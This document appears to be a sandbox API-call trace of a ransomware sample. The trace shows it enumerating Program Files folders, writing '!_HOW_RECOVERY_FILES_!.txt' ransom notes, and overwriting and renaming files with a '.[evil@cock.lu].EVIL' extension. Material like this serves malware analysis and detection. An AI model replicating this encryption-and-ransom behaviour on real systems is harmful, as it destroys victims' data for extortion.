[0088.735] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.735] strlen (_Str="${CODE}") returned 0x7 [0088.735] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.735] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.735] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.735] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\ink\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.735] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.735] __uncaught_exception () returned 0x84b1160800 [0088.735] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.736] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0088.736] wcsstr (_Str="MSInfo", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.736] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 54 [0088.736] wcscmp (_String1=".", _String2="MSInfo") returned -1 [0088.736] wcscmp (_String1="..", _String2="MSInfo") returned -1 [0088.736] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 0x36 [0088.736] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 0x0 [0088.736] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*" [0088.736] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dde00 [0088.736] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.736] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\.") returned 56 [0088.736] wcscmp (_String1=".", _String2=".") returned 0 [0088.736] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.736] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.736] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\..") returned 57 [0088.737] wcscmp (_String1=".", _String2="..") returned -1 [0088.737] wcscmp (_String1="..", _String2="..") returned 0 [0088.737] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.737] wcsstr (_Str="en-US", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.737] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 60 [0088.737] wcscmp (_String1=".", _String2="en-US") returned -1 [0088.737] wcscmp (_String1="..", _String2="en-US") returned -1 [0088.737] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 0x3c [0088.737] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 0x0 [0088.737] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*" [0088.737] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11ddce0 [0088.737] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.737] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\.") returned 62 [0088.737] wcscmp (_String1=".", _String2=".") returned 0 [0088.737] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.737] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.737] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\..") returned 63 [0088.737] wcscmp (_String1=".", _String2="..") returned -1 [0088.737] wcscmp (_String1="..", _String2="..") returned 0 [0088.737] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.737] wcsstr (_Str="msinfo32.exe.mui", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.737] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 77 [0088.737] wcscmp (_String1="msinfo32.exe.mui", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.737] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msinfo32.exe.mui") returned 0x0 [0088.737] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui") returned 0x4d [0088.737] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\msinfo32.exe.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\en-us\\msinfo32.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.749] GetLastError () returned 0x5 [0088.749] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0088.750] FindClose (in: hFindFile=0x84b11ddce0 | out: hFindFile=0x84b11ddce0) returned 1 [0088.750] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US") returned 0x3c [0088.750] strlen (_Str="${KEY}") returned 0x6 [0088.750] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.750] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.750] strlen (_Str="${CODE}") returned 0x7 [0088.750] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.750] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.750] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.750] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\en-US\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.751] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.751] __uncaught_exception () returned 0x84b1160800 [0088.751] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.751] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.751] wcsstr (_Str="msinfo32.exe", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.751] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 67 [0088.751] wcscmp (_String1="msinfo32.exe", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.751] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="msinfo32.exe") returned 0x0 [0088.751] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe") returned 0x43 [0088.752] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0088.752] GetLastError () returned 0x5 [0088.752] FindNextFileW (in: hFindFile=0x84b11dde00, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0088.752] FindClose (in: hFindFile=0x84b11dde00 | out: hFindFile=0x84b11dde00) returned 1 [0088.752] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo") returned 0x36 [0088.752] strlen (_Str="${KEY}") returned 0x6 [0088.752] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x391) returned 0x84b116d0f0 [0088.752] memchr (_Buf=0x84b116d0f1, _Val=36, _MaxCount=0x1b0) returned 0x0 [0088.752] strlen (_Str="${CODE}") returned 0x7 [0088.752] memchr (_Buf=0x84b116cf10, _Val=36, _MaxCount=0x390) returned 0x84b116d0f0 [0088.752] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.752] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0088.753] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\MSInfo\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.753] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0088.753] __uncaught_exception () returned 0x84b1160800 [0088.753] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.754] FindNextFileW (in: hFindFile=0x84b11dd2c0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0088.754] wcsstr (_Str="OFFICE16", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.754] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 56 [0088.754] wcscmp (_String1=".", _String2="OFFICE16") returned -1 [0088.754] wcscmp (_String1="..", _String2="OFFICE16") returned -1 [0088.754] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 0x38 [0088.754] wcscpy_s (in: _Destination=0x84b0fde170, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16") returned 0x0 [0088.754] wcscat (in: _Dest=0x84b0fde170, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*" [0088.754] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\*", lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0x84b11dd680 [0088.755] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.755] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\.") returned 58 [0088.755] wcscmp (_String1=".", _String2=".") returned 0 [0088.755] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.755] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.755] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\..") returned 59 [0088.755] wcscmp (_String1=".", _String2="..") returned -1 [0088.755] wcscmp (_String1="..", _String2="..") returned 0 [0088.755] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.755] wcsstr (_Str="LICLUA.EXE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.755] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 67 [0088.755] wcscmp (_String1="LICLUA.EXE", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.755] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LICLUA.EXE") returned 0x0 [0088.755] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE") returned 0x43 [0088.755] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0088.757] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x8d0c8, lpOverlapped=0x0) returned 1 [0088.796] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.796] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.796] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.796] _errno () returned 0x84b1160840 [0088.797] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.797] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x8d0e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x8d0e0, lpOverlapped=0x0) returned 1 [0088.798] CloseHandle (hObject=0x1a4) returned 1 [0088.804] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.804] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.804] __uncaught_exception () returned 0x84b1160800 [0088.804] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.810] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe.[evil@cock.lu].evil")) returned 1 [0088.811] ??_V@YAXPEAX@Z () returned 0x1 [0088.813] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE", dwFileAttributes=0x0) returned 0 [0088.814] FindNextFileW (in: hFindFile=0x84b11dd680, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0088.814] wcsstr (_Str="Office Setup Controller", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.814] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 80 [0088.814] wcscmp (_String1=".", _String2="Office Setup Controller") returned -1 [0088.814] wcscmp (_String1="..", _String2="Office Setup Controller") returned -1 [0088.814] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 0x50 [0088.814] wcscpy_s (in: _Destination=0x84b0fddc50, _SizeInWords=0x104, _Source="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller" | out: _Destination="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller") returned 0x0 [0088.814] wcscat (in: _Dest=0x84b0fddc50, _Source="\\*" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*") returned="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*" [0088.814] FindFirstFileW (in: lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\*", lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0x84b11dd1a0 [0088.825] wcsstr (_Str=".", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.825] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\.") returned 82 [0088.825] wcscmp (_String1=".", _String2=".") returned 0 [0088.825] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.825] wcsstr (_Str="..", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.825] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\..") returned 83 [0088.825] wcscmp (_String1=".", _String2="..") returned -1 [0088.825] wcscmp (_String1="..", _String2="..") returned 0 [0088.825] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.825] wcsstr (_Str="pidgenx.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.825] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 92 [0088.825] wcscmp (_String1="pidgenx.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.825] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="pidgenx.dll") returned 0x0 [0088.825] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll") returned 0x5c [0088.825] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0088.827] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x100000, lpOverlapped=0x0) returned 1 [0088.859] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.859] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.859] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.860] _errno () returned 0x84b1160840 [0088.862] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.862] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x100020, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x100020, lpOverlapped=0x0) returned 1 [0088.868] CloseHandle (hObject=0x1a8) returned 1 [0088.889] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.889] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.889] __uncaught_exception () returned 0x84b1160800 [0088.890] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.903] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.[evil@cock.lu].evil")) returned 1 [0088.904] ??_V@YAXPEAX@Z () returned 0x1 [0088.907] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll", dwFileAttributes=0x0) returned 0 [0088.907] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.907] wcsstr (_Str="pkeyconfig-office.xrm-ms", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.907] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 105 [0088.907] wcscmp (_String1="pkeyconfig-office.xrm-ms", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.907] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="pkeyconfig-office.xrm-ms") returned 0x0 [0088.907] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms") returned 0x69 [0088.907] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0088.909] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x9c0af, lpOverlapped=0x0) returned 1 [0088.936] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.936] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.936] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.936] _errno () returned 0x84b1160840 [0088.937] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.937] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x9c0c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x9c0c0, lpOverlapped=0x0) returned 1 [0088.938] CloseHandle (hObject=0x1a8) returned 1 [0088.944] _wfsopen (_FileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0088.945] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0088.945] __uncaught_exception () returned 0x84b1160800 [0088.945] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0088.952] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms"), lpNewFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig-office.xrm-ms.[evil@cock.lu].evil")) returned 1 [0088.952] ??_V@YAXPEAX@Z () returned 0x1 [0088.955] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig-office.xrm-ms", dwFileAttributes=0x0) returned 0 [0088.955] FindNextFileW (in: hFindFile=0x84b11dd1a0, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0088.955] wcsstr (_Str="pkeyconfig.companion.dll", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0088.955] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 105 [0088.955] wcscmp (_String1="pkeyconfig.companion.dll", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0088.955] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="pkeyconfig.companion.dll") returned 0x0 [0088.955] wcslen (_String="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll") returned 0x69 [0088.955] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pkeyconfig.companion.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pkeyconfig.companion.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0088.957] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x74c8, lpOverlapped=0x0) returned 1 [0088.960] strcmp (_Str1="IV", _Str2="ValueNames") returned -1 [0088.960] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.960] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0088.960] _errno () returned 0x84b1160840 [0088.960] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.960] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x74e0, lpNumberOfBytesWritten=0x84b0fdd7a0, 